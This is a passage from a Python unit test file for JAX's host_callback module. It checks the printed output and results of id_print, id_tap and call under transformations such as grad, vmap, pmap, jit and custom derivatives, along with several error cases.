y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * (y * 3.)
grad_func = api.grad(api.grad(func))
# making the Jaxpr does not print anything
_ = api.make_jaxpr(grad_func)(5.)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "", testing_stream.output)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(12., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00
transforms: ['jvp', 'transpose'] what: x * 2
3.00
transforms: ['jvp', 'transpose', 'jvp', 'transpose'] what: x * 2
2.00""", testing_stream.output)
testing_stream.reset()
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_grad_pytree(self):
def func(x):
x4, x5 = hcb.id_print((x * 2., x * 3.), what="pair",
result=(x * 4., x * 5.),
output_stream=testing_stream)
return x4 + 2. * x5
x = jnp.float32(5.)
grad_func = api.grad(func)
print(api.make_jaxpr(grad_func)(x))
res_grad = grad_func(x)
self.assertAllClose(14., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: pair
( 10.00
15.00 )
transforms: ['jvp', 'transpose'] what: pair
( 0.00
0.00 )""", testing_stream.output)
testing_stream.reset()
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_jvp_float0(self):
def f(x, yint):
x, yint = hcb.id_tap(lambda arg, _: arg, (x, yint))
return x * yint
res = api.jvp(f, (2., 3), (0.2, np.zeros((), dtypes.float0)))
self.assertAllClose((6., 0.6), res)
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_grad_float0(self):
def func(x, yint):
x, yint = hcb.id_print((x, yint), what="pair", output_stream=testing_stream)
return x * yint
grad_func = api.grad(func)
res_grad = grad_func(jnp.float32(5.), jnp.int32(2))
self.assertAllClose(2., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: pair
( 5.00
2 )
transforms: ['jvp', 'transpose'] what: pair
( 2.00
False )""", testing_stream.output)
testing_stream.reset()
def test_vmap(self):
vmap_fun1 = api.vmap(fun1)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
vmap_fun1(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] what: a * 2
[ 8.00 10.00]
transforms: [('batch', {'batch_dims': (0,)})] what: y * 3
[24.00 30.00]""", testing_stream.output)
testing_stream.reset()
def test_vmap_not_batched(self):
x = 3.
def func(y):
# x is not mapped, y is mapped
_, y = hcb.id_print((x, y), output_stream=testing_stream)
return x + y
vmap_func = api.vmap(func)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
_ = vmap_func(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (None, 0)})]
( 3.00
[4.00 5.00] )""", testing_stream.output)
testing_stream.reset()
def test_vmap_vmap(self):
# A 2D tensor with x[i, j] = i + j using 2 vmap
def sum(x, y):
return hcb.id_print(x + y, output_stream=testing_stream)
def sum_rows(xv, y):
return api.vmap(sum, in_axes=(0, None))(xv, y)
def sum_all(xv, yv):
return api.vmap(sum_rows, in_axes=(None, 0))(xv, yv)
xv = jnp.arange(5, dtype=np.int32)
yv = jnp.arange(3, dtype=np.int32)
# assertMultiLineStrippedEqual(self, "", str(api.make_jaxpr(sum_all)(xv, yv)))
_ = sum_all(xv, yv)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)}), ('batch', {'batch_dims': (0,)})]
[[0 1 2 3 4]
[1 2 3 4 5]
[2 3 4 5 6]]""", testing_stream.output)
testing_stream.reset()
def test_vmap_while(self):
"""Vmap of while."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = lax.while_loop(lambda x: x < 2,
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x2, where="3", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
self.assertAllClose(np.array([2, 2, 2, 3, 4]), api.jit(api.vmap(func))(inputs),
check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] where: 1
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: 3
[2 2 2 3 4]""", testing_stream.output)
testing_stream.reset()
def test_vmap_while_tap_cond(self):
"""Vmap of while, with a tap in the conditional."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = lax.while_loop(lambda x: hcb.id_print(x < 2, where="w_c",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x2, where="3", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
res = api.jit(api.vmap(func))(inputs)
hcb.barrier_wait()
self.assertAllClose(np.array([2, 2, 2, 3, 4]), res, check_dtypes=False)
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] where: 1
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True True False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[False False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: 3
[2 2 2 3 4]""", testing_stream.output)
testing_stream.reset()
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_composed(self):
def power(x, n):
x, n = hcb.id_print((x, n), output_stream=testing_stream)
return x * x * n * x
def f(x, n):
return x * power(x + 1., n)
x = 3.
print("impl = ", f(x, 2.))
hcb.barrier_wait()
expected = """
( 4.
2. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print("jvp = ", api.jvp(lambda x: f(x, 2.), (x,), (1.,)))
hcb.barrier_wait()
expected = """
transforms: ['jvp']
( ( 4.
2. )
( 1.
0. ) )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print("grad = ", api.grad(f)(x, 2.))
hcb.barrier_wait()
expected = """
( 4.
2. )
transforms: ['jvp', 'transpose']
( 288.
192. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
xv = np.array([3., 4.])
print("vmap o grad = ", api.vmap(api.grad(f))(xv, np.array([2., 3.])))
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})]
( [4. 5.]
[2. 3.] )
transforms: ['jvp', 'transpose', ('batch', {'batch_dims': (0, 0)})]
( [288. 900.]
[192. 500.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
def test_pmap(self):
xv = jnp.arange(api.device_count(), dtype=jnp.int32)
def fun1(x, do_print=False): # x: i32
return maybe_print(do_print, x * 2, "x * 2", tap_with_device=True)
pmap_fun1 = api.pmap(partial(fun1, do_print=True))
res = pmap_fun1(xv)
hcb.barrier_wait()
expected_res = api.pmap(partial(fun1, do_print=False))(xv)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: x * 2
0
device: cpu:1 what: x * 2
2""")
testing_stream.reset()
def test_pmap_vmap(self):
# A matrix M[ij] = i * 10 + j
nr_devices = api.device_count()
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.int32)
def fun1(x, do_print=False): # x: i32
return maybe_print(do_print, x * 2, "x * 2", tap_with_device=True)
pmap_vmap_fun1 = api.pmap(api.vmap(partial(fun1, do_print=True)))
res = pmap_vmap_fun1(matrix)
hcb.barrier_wait()
expected_res = api.pmap(api.vmap(partial(fun1, do_print=False)))(matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[20.00 22.00 24.00]""")
testing_stream.reset()
def test_pmap_pmap_vmap(self):
# A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = api.local_device_count()
if nr_devices % 2 != 0:
raise SkipTest("test works only on even number of devices")
shape = (2, nr_devices // 2, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun1(x, do_print=False): # x: f32
y = maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)
return y ** 2
pmap_fun1 = api.pmap(api.pmap(api.vmap(partial(fun1, do_print=True))))
res = pmap_fun1(matrix)
hcb.barrier_wait()
expected_res = api.pmap(api.pmap(api.vmap(partial(fun1, do_print=False))))(matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[200.00 202.00 204.00]""")
testing_stream.reset()
@ignore_jit_of_pmap_warning()
def test_pmap_pmap_extra(self):
"""pmap of a pmap surrounded by extra code."""
# A matrix M[ij] = i * 10 + j
nr_devices = api.local_device_count()
if nr_devices != 2:
raise SkipTest("test works only on 2 devices")
shape = (2, 1, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# This will be printed on all devices, with shape [1, 3]
xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
res = api.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
# This will be printed on all devices, with shape [1, 3]
return maybe_print(do_print, res + 1., "after", tap_with_device=True)
res = api.pmap(partial(fun, do_print=True))(matrix)
self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]
device: cpu:1 what: before
[[101.00 102.00 103.00]]
device: cpu:1 what: inside
[202.00 204.00 206.00]
device: cpu:1 what: after
[[203.00 205.00 207.00]]""")
testing_stream.reset()
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_jvp_pmap_vmap(self):
# A matrix M[ijk] = i * 100 + j * 10 * k
nr_devices = api.local_device_count()
shape = (nr_devices, 2, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# x: f32[3]
return api.jvp(api.pmap(api.vmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True))),
(xv,), (.1 * jnp.ones_like(xv),))
res = fun(matrix, do_print=True)
hcb.barrier_wait()
expected_res = fun(matrix, do_print=False)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
# Device 0 will get to execute api.jvp(api.vmap(...)) for matrix[0, :, :]
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[ 0.00 2.00 4.00]
[20.00 22.00 24.00]]
[[0.20 0.20 0.20]
[0.20 0.20 0.20]] )
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[200.00 202.00 204.00]
[220.00 222.00 224.00]]
[[0.20 0.20 0.20]
[0.20 0.20 0.20]] )""")
testing_stream.reset()
def test_vmap_pmap(self):
# A matrix M[ijk] = i * 100 + j * 10 * k
nr_devices = api.local_device_count()
shape = (2, nr_devices, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# x: f32[3]
return api.vmap(api.pmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)))(xv)
res = fun(matrix, do_print=True)
hcb.barrier_wait()
expected_res = fun(matrix, do_print=False)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
# Device 0 will get to execute api.jvp(api.vmap(...)) for matrix[:, 0, :]
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 0.00 2.00 4.00]
[200.00 202.00 204.00]]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 20.00 22.00 24.00]
[220.00 222.00 224.00]]""")
testing_stream.reset()
@ignore_jit_of_pmap_warning()
def test_jit_pmap_extra(self):
"""jit of a pmap surrounded by extra code."""
# A matrix M[ij] = i * 10 + j
nr_devices = api.local_device_count()
assert nr_devices in (1, 2)
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# This will be printed on all devices with shape (nr_devices, 3)
xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
res = api.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
# This will be printed on all devices with shape (nr_devices, 3)
return maybe_print(do_print, res + 1., "after", tap_with_device=True)
res = api.jit(partial(fun, do_print=True))(matrix)
self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
if api.device_count() == 2:
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]
device: cpu:1 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:1 what: inside
[22.00 24.00 26.00]
device: cpu:1 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]""")
else:
assert api.device_count() == 1
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]""")
testing_stream.reset()
def test_cond_pmap(self):
raise SkipTest("cond of pmap does not work in JAX. Issue #5178.")
# A matrix M[ij] = i * 10 + j
nr_devices = api.local_device_count()
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun1(x, do_print=False):
return maybe_print(do_print, x * 2., "x * 2")
def fun2(cond, xv, do_print=False):
return lax.cond(cond, api.pmap(partial(fun1, do_print=do_print)),
lambda xv: xv, xv)
res = fun2(True, matrix)
self.assertAllClose(fun2(True, matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
TBD""", testing_stream.output)
testing_stream.reset()
def test_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@api.custom_jvp
def f(x):
return x * hcb.id_print(x, output_stream=testing_stream, what="x")
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot, output_stream=testing_stream, what="x_dot")
return primal_out, tangent_out
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertAllClose(0.7 * 0.7 * 2, g(arg))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
testing_stream.reset()
self.assertAllClose(np.array([2.1, 2.1]), api.grad(g)(arg), check_dtypes=False)
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
transforms: ['transpose'] what: x_dot
2.1
transforms: ['transpose'] what: x_dot
2.1""", testing_stream.output)
def test_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@api.custom_vjp
def f(x):
return x * hcb.id_print(x, output_stream=testing_stream, what="x")
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b, output_stream=testing_stream, what="ct_b"),
f.defvjp(f_fwd, f_bwd)
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertAllClose(0.7 * 0.7 * 2, g(arg))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
testing_stream.reset()
self.assertAllClose(np.array([2.1, 2.1]), api.grad(g)(arg), check_dtypes=False)
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
what: ct_b
1.
what: ct_b
1.""", testing_stream.output)
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_mask(self):
@partial(api.mask, in_shapes=['n'], out_shape='')
def padded_sum(x):
three_x = hcb.id_print((x, 2 * x), result=3 * x, what="x",
output_stream=testing_stream)
return jnp.sum(three_x)
x = np.arange(5.)
self.assertAllClose(9., padded_sum([x], dict(n=3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.]
[0. 2. 4. 6. 8.] )
( ( 3 )
( 3 ) ) )""", testing_stream.output)
testing_stream.reset()
# With VMAP
xv = np.arange(10.).reshape((2, 5)) # logical_shape = 5
self.assertAllClose(
np.array([9., 78.]),
# batch_size = 2, n=3 and 4 for the two elements
api.vmap(padded_sum)([xv],
dict(n=np.array([3., 4.]))))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), ('batch', {'batch_dims': (0, 0, 0, 0)})] what: x
( ( [[0. 1. 2. 3. 4.]
[5. 6. 7. 8. 9.]]
[[ 0. 2. 4. 6. 8.]
[10. 12. 14. 16. 18.]] )
( ( [3. 4.] )
( [3. 4.] ) ) )""", testing_stream.output)
testing_stream.reset()
# With JVP
self.assertAllClose((9., 0.9),
api.jvp(lambda arg: padded_sum([arg], dict(n=3)),
(x,), (x * 0.1,)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), 'jvp'] what: x
( ( ( [0. 1. 2. 3. 4.]
[0. 2. 4. 6. 8.] )
( ( 3 )
( 3 ) ) )
( ( [0. 0.1 0.2 0.3 0.4]
[0. 0.2 0.4 0.6 0.8] )
( ( False )
( False ) ) ) )""", testing_stream.output)
testing_stream.reset()
# Now with JIT
self.assertAllClose(9., api.jit(padded_sum)([x], dict(n=3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.]
[0. 2. 4. 6. 8.] )
( ( 3 )
( 3 ) ) )""", testing_stream.output)
testing_stream.reset()
def test_callback_delay(self):
hcb.callback_extra = lambda dev: time.sleep(1)
def func(x):
for i in range(5):
x = hcb.id_print(x * i, what="x times i")
return x
api.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
def test_callback_delay_barrier(self):
hcb.callback_extra = lambda dev: time.sleep(2)
def func(x):
for i in range(1, 4):
x = hcb.id_print(x * i, what="x times i", output_stream=testing_stream)
return x
api.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
# Wait for the results
hcb.barrier_wait()
expected = """
what: x times i
[[0. 1. 2.]
[3. 4. 5.]]
what: x times i
[[ 0. 2. 4.]
[ 6. 8. 10.]]
what: x times i
[[ 0. 6. 12.]
[18. 24. 30.]]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
# Call again
api.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_error_bad_consumer_id(self):
"""Try to use reserved consumer ID 0.
Check that we get the proper error from the runtime."""
comp = xla_bridge.make_computation_builder(self._testMethodName)
token = hcb.xops.CreateToken(comp)
hcb._initialize_outfeed_receiver() # Needed if this is the sole test
with self.assertRaisesRegex(RuntimeError,
"Consumer ID cannot be a reserved value: 0"):
hcb._outfeed_receiver.receiver.add_outfeed(
comp, token, 0,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.float32))])
def test_error_different_shapes(self):
"""Try to register different shapes for the same consumer ID."""
comp = xla_bridge.make_computation_builder(self._testMethodName)
token = hcb.xops.CreateToken(comp)
hcb._initialize_outfeed_receiver() # Needed if this is the sole test
hcb._outfeed_receiver.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.float32))])
with self.assertRaisesRegex(
RuntimeError, ".*does not match previous shape element_type.*"):
hcb._outfeed_receiver.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.int32))])
with self.assertRaisesRegex(
RuntimeError, ".*does not match previous shape element_type.*"):
hcb._outfeed_receiver.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2,), dtype=np.float32))])
def test_id_tap_removed_kwargs(self):
def func(x, transforms, y):
pass
with self.assertRaisesRegex(TypeError, r"Support for \*\*kwargs in ``id_tap``"):
hcb.id_tap(func, 1, y=2)
def test_odeint(self):
# TODO: find a smaller repro for bug #4015
# Seems to be xla_call(scan(xla_call)), all under grad.
from jax.experimental.ode import odeint
def f(x, t, k):
x = hcb.id_print(x)
return -k * x
def loss(k=1.0):
t = jnp.linspace(0, 0.001, num=2)
xs = odeint(f, 1.0, t, k)
return xs[-1]
api.grad(loss)(1.0) # should not fail
def test_remat(self):
def f(i, k):
x = hcb.id_print(k + i, output_stream=testing_stream)
return k * x
def loss(k):
return lax.fori_loop(0, 2, api.remat(f), k)
print(loss(3))
hcb.barrier_wait()
expected = """
3
10"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_named_call(self):
if not config.omnistaging_enabled:
raise SkipTest("Test requires omnistaging")
def tap_scalar(init, do_print=False):
@partial(api.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2))
self.assertAllClose(tap_scalar(3., do_print=False), tap_scalar(3., do_print=True))
hcb.barrier_wait()
expected = """
what: step_nr
0
what: step_nr
1"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
class HostCallbackCallTest(jtu.JaxTestCase):
"""Tests for hcb.call"""
def setUp(self):
testing_stream.reset()
testing_stream.test_method_name = self._testMethodName
super().setUp()
def tearDown(self) -> None:
hcb.barrier_wait("HostCallbackCallTest.tearDown")
super().tearDown()
def call_log_testing_stream(self, func, arg, *, result_shape, name=""):
"""Call `func` and log inputs and outputs to the testing stream"""
def call_log(arg):
def val2str(v):
return np.array2string(np.array(arg))
testing_stream.write(f"Call {name}({val2str(arg)})\n")
res = func(arg)
testing_stream.write(f" = {val2str(res)}\n")
return res
return hcb.call(call_log, arg, result_shape=result_shape)
def test_call_simple(self):
def f_outside(args):
x, y = args
return x * y
def fun(x, use_outside=True):
return 2 * (hcb.call(f_outside, (x, x + 1),
result_shape=x)
if use_outside else f_outside((x, x + 1)))
res_inside = fun(2, use_outside=False)
self.assertAllClose(res_inside, fun(2, use_outside=True))
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_call_no_result(self):
def f_outside(arg):
self.call_log_testing_stream(lambda x: None, arg,
result_shape=None,
name="outside")
return arg
self.assertAllClose((3., 4.), f_outside((3., 4.)))
hcb.barrier_wait()
expected = """
Call outside([3. 4.])
= [3. 4.]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_call_cond(self):
def f_outside(args):
x, y = args
return x * y
def loop(x, use_outside=True):
def body(i, acc):
return lax.cond(i % 2 == 1,
lambda _: (hcb.call(f_outside, (acc, i),
result_shape=acc)
if use_outside else f_outside((acc, i))),
lambda _: acc,
None)
return lax.fori_loop(0, 18, body, x)
res_inside = loop(1.2, use_outside=False)
self.assertAllClose(res_inside, loop(1.2, use_outside=True))
def test_jit_scan_call(self):
def f_outside(x):
return x
def loop(x, use_outside=True):
def body(carry, i):
if use_outside:
return carry + hcb.call(f_outside, i,
result_shape=i), None
else:
return carry + i, None
return lax.scan(body, 0, x)
x = np.arange(5, dtype=np.int32)
res_outside = api.jit(partial(loop, use_outside=True))(x)
self.assertAllClose(res_outside, loop(x, use_outside=False))
def test_doc_example1(self):
"""Examples from the documentation: simplest, call a function"""
def host_eig(x):
return np.linalg.eigvals(x)
shape = (2, 5, 4, 4)
m = np.ones(shape, dtype=np.float32)
def fun(m):
eig_m = hcb.call(host_eig, m,
result_shape=api.ShapeDtypeStruct(m.shape[:-1], m.dtype))
return eig_m
expected_res = np.linalg.eigvals(m)
self.assertAllClose(expected_res, fun(m))
def test_doc_example_hlo(self):
"""Examples from the documentation: simplest, call a function"""
def fun(m):
return jnp.sin(hcb.call(lambda x: np.cos,
jnp.cos(m),
result_shape=m))
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun, m)
def fun(m):
x = hcb.call(lambda x: None, 2, result_shape=())
return x
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun, m)
def test_call_with_device(self):
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x
def func(x):
return hcb.call(callback_func, x,
result_shape=x,
call_with_device=True)
self.assertEqual(3., func(3.))
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 3.00""")
testing_stream.reset()
def test_call_pmap(self):
# Works for 1 or 2 devices
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x * np.array(3, np.int32)
def fun(x): # x: i32
return hcb.call(callback_func, x * 2,
result_shape=x,
call_with_device=True)
xv = jnp.arange(api.device_count(), dtype=jnp.int32)
res = api.pmap(fun)(xv)
self.assertAllClose(api.pmap(lambda x: x * 6)(xv), res)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 0
device: cpu:1
Called with 2""")
testing_stream.reset()
def test_call_vmap(self):
def f_outside(x): return x
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
with self.assertRaisesRegex(NotImplementedError, "Batching rule for 'outside_call' not implemented"):
api.vmap(fun)(np.ones((2, 3)))
def test_error_bad_result_shape(self):
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape="string")
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape=lambda x: x)
hcb.barrier_wait("wait for error")
def helper_check_callback_errors(self, thunk: Callable,
expected_exc_txt: str):
"""Calls thunk() and checks for expected exceptions.
"""
if jtu.device_under_test() == "cpu":
# On CPU the runtime crashes, and the tests are all aborted
raise SkipTest("TODO: CPU runtime crashes on unexpected infeed")
elif jtu.device_under_test() == "gpu":
# On GPU we get a nice error back to Python
with self.assertRaisesRegex(
RuntimeError,
"RET_CHECK failure .* Mismatch between infeed source buffer shape s8.12345."):
thunk()
elif jtu.device_under_test() == "tpu":
# On TPU we get no error!!!
raise SkipTest("TODO: TPU runtime does not check infeed, and just computes with garbage")
# Both on GPU and TPU we also get an error during the barrier_wait at the
# end of the test. Run a barrier_wait now, to consume that error.
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile(
"There were exceptions during callback processing.*Last one was:.*" +
expected_exc_txt,
re.DOTALL)):
hcb.barrier_wait("Waiting for error")
def test_error_callback_throws_exception(self):
def f_outside(x):
raise ValueError("user exception")
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
self.helper_check_callback_errors(lambda: fun(3.),
"ValueError: user exception")
def test_error_callback_returns_unexpected_shape(self):
def fun(x):
return hcb.call(lambda x: (x, x), x, result_shape=x)
self.helper_check_callback_errors(lambda: fun(3.),
"Callback func .* should have returned a result with pytree")
def test_error_then_compute(self):
# Continue computation on device after error
def f_outside(x):
raise ValueError("user exception")
def fun(x):
x1 = hcb.call(f_outside, x, result_shape=x)
return x1
arg = np.arange(3, dtype=np.int32)
self.helper_check_callback_errors(lambda: self.assertAllClose(arg, fun(arg)),
"ValueError: user exception")
def call_jax_other_device(jax_outside_fun, arg, *, device):
"""Calls a JAX function on a specific device with simple support for reverse AD.
Functions whose name starts with "jax_outside" are called on another device,
by way of hcb.call.
"""
def run_jax_outside_fun(arg):
return api.jit(jax_outside_fun)(api.device_put(arg, device))
@api.custom_vjp
def make_call(arg):
return hcb.call(run_jax_outside_fun, arg,
result_shape=api.eval_shape(jax_outside_fun, arg))
# Define the fwd and bwd custom_vjp functions
def make_call_vjp_fwd(arg):
# Return the primal argument as the residual. Use `make_call` for the
# primal computation to enable higher-order AD.
